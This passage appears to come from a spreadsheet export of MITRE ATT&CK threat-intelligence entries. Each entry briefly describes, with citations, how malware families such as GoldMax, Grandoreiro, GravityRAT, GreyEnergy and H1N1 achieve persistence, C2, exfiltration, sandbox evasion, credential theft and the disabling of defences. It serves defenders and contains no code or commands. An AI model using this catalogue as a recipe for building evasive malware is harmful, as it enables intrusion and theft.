    <t>[GoldMax](https://attack.mitre.org/software/S0588) has decoded and decrypted the configuration file when executed.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can exfiltrate files over the existing C2 channel.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can download and execute additional files.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used decoy traffic to surround its malicious network traffic to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has impersonated systems management software to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has written AES-encrypted and Base64-encoded configuration files to disk.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used scheduled tasks to maintain persistence.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has been packed for obfuscation.(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) will check if it is being run in a virtualized environment by comparing the collected MAC address to &lt;code&gt;c8:27:cc:c2:37:5a&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) retrieved a list of the system's network interface after execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldMax](https://attack.mitre.org/software/S0588) can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) </t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can spawn a command shell, and execute native commands.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has been packaged with a legitimate tax preparation software.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has exfiltrated host environment information to an external C2 domain via port 9006.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.(Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has included a program "ExeProtector", which monitors for the existence of [GoldenSpy](https://attack.mitre.org/software/S0493) on the infected system and redownloads if necessary.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) constantly attempts to download and execute files from the remote C2, including [GoldenSpy](https://attack.mitre.org/software/S0493) itself if not found on the system.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) can create new users on an infected system.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s setup file installs initial executables under the folder &lt;code&gt;%WinDir%\System32\PluginManager&lt;/code&gt;.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands in the Windows command shell using the &lt;code&gt;WinExec()&lt;/code&gt; API.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller has base64-encoded its variables. (Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has gathered operating system information.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s installer has delayed installation of [GoldenSpy](https://attack.mitre.org/software/S0493) for two hours after it reaches a victim system.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands via the command-line interface.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has established persistence by running in the background as an autostart service.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has had null characters padded in its malicious DLL payload.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate documents from infected systems.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has used a polymorphic decryptor to decrypt itself at runtime.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to disable Microsoft Outlook's security policies to disable macro warnings.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate data over the Microsoft Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to delete emails used for C2 once the content has been copied.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to  enumerate the infected system's user name via &lt;code&gt;GetUserNameW&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477)'s decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has checked for the Google Updater process to ensure [Goopy](https://attack.mitre.org/software/S0477) was loaded properly.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to maintain persistence by creating scheduled tasks set to run every hour.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on window names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use SSL in C2 communication.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can utilize web services including Google sites to send and receive C2 data.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has added BMP images to the resources section of its Portable Executable (PE) file increasing each binary to at least 300MB in size.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use malicious browser extensions to steal cookies and other user information.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can bypass UAC by registering as the default handler for .MSC files.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can capture clipboard data from a compromised host.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal cookie data and credentials from Google Chrome.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can obtain C2 information from Google Docs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can decrypt its encrypted internal strings.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used compromised websites and Google Ads to bait victims into downloading its installer.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can parse Outlook .pst files to extract e-mail addresses.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can send data it retrieves to the C2 server.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can delete .LNK files created in the Startup folder.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can download its second stage from a hardcoded URL within the loader's code.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can log keystrokes on the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has infected victims via malicious attachments.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used malicious links to gain execution on victim machines.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has named malicious browser extensions and update files to appear legitimate.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can store its configuration in the Registry at &lt;code&gt;HKCU\Software\&lt;/code&gt; under frequently changing names including &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;ToolTech-RM&lt;/code&gt;.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use MSI files to execute DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can execute through the &lt;code&gt;WinExec&lt;/code&gt; API.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>The [Grandoreiro](https://attack.mitre.org/software/S0531) payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on process names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use run keys and create link files in the startup folder for persistence.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Grandoreiro](https://attack.mitre.org/software/S0531) can write or modify browser shortcuts to enable launching of malicious browser extensions.(Citation: IBM Grandoreiro April 2020) </t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has been spread via malicious links embedded in e-mails.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal the victim's cookies to use for duplicating the active session from another device.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can detect VMWare via its I/O port and Virtual PC via the &lt;code&gt;vpcext&lt;/code&gt; instruction.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the computer name and OS version from a compromised host.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the IP and physical location of the compromised host via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the username from the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the time on the victim machine via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use VBScript to execute malicious code.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has the ability to use HTTP in C2 communications.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can modify the binary ACL to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files based on an extension list if a USB drive is connected to the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has been delivered via Word documents using DDE for execution.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>The author of [GravityRAT](https://attack.mitre.org/software/S0237) submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has used HTTP over a non-standard port, such as TCP port 46769.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) supports file encryption (AES with the key "lolomycin2017").(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) lists the running processes on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) creates a scheduled task to ensure it is re-executed everyday.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses WMI to check the BIOS and manufacturer information for strings like "VMWare", "Virtual", and "XEN" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment. (Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the MAC address, computer name, and CPU information.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim IP address, MAC address, as well as the victim account domain name.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses the &lt;code&gt;netstat&lt;/code&gt; command to find open ports on the victim’s machine.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim username along with other account information (account type, description, full name, SID and status).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has a feature to list the available services on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) can obtain the date and time of a system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses HTTP for C2.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) executes commands remotely on the infected host.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using RSA-2048.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) digitally signs the malware with a code-signing certificate.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can download additional modules and payloads.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to harvest pressed keystrokes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module for [Mimikatz](https://attack.mitre.org/software/S0002) to collect Windows credentials from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) modifies conditions in the Registry and adds keys.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has used Tor relays for Command and Control servers.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts its configuration files with AES-256 and also encrypts its strings.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to inject a PE binary into a remote process.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is packed for obfuscation.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using AES256.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) enumerates all Windows services.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses HTTP and HTTPS for C2 communications.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses cmd.exe to execute itself in-memory.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can delete its executable from the &lt;code&gt;AppData\Local\Temp&lt;/code&gt; directory on the compromised host.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>The [GuLoader](https://attack.mitre.org/software/S0561) executable has been retrieved via embedded macros in malicious Word documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has relied upon users clicking on links to malicious documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can establish persistence via the Registry under &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has been spread in phishing campaigns using malicious web links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can use HTTP to retrieve additional binaries.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) obfuscates C2 traffic with an altered version of base64.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Firewall.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Security Center, and Windows Defender.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) disable recovery options and deletes shadow copies from the victim.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses multiple techniques to obfuscate strings, including XOR.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to removable media.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses a custom packing algorithm.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) encrypts C2 traffic using an RC4 key.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to network shares.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services by using cmd.exe.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can delete a specified file.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can execute PowerShell scripts.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about running processes on the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain screenshots from the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about the OS, processor, and BIOS.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can use WMI queries to gather system information.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) has used &lt;code&gt;-WindowStyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>The "tDiscoverer" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. [HAMMERTOSS](https://attack.mitre.org/software/S0037) binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is known to use PowerShell.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is controlled via commands that are appended to image files.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>Before being appended to image files, [HAMMERTOSS](https://attack.mitre.org/software/S0037) commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>The "Uploader" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) visits a hard-coded server over HTTP/S to download the images [HAMMERTOSS](https://attack.mitre.org/software/S0037) uses to receive commands.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>can download and execute a second-stage payload.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>can collect the victim user name.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) opens the Windows Firewall to modify incoming connections.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
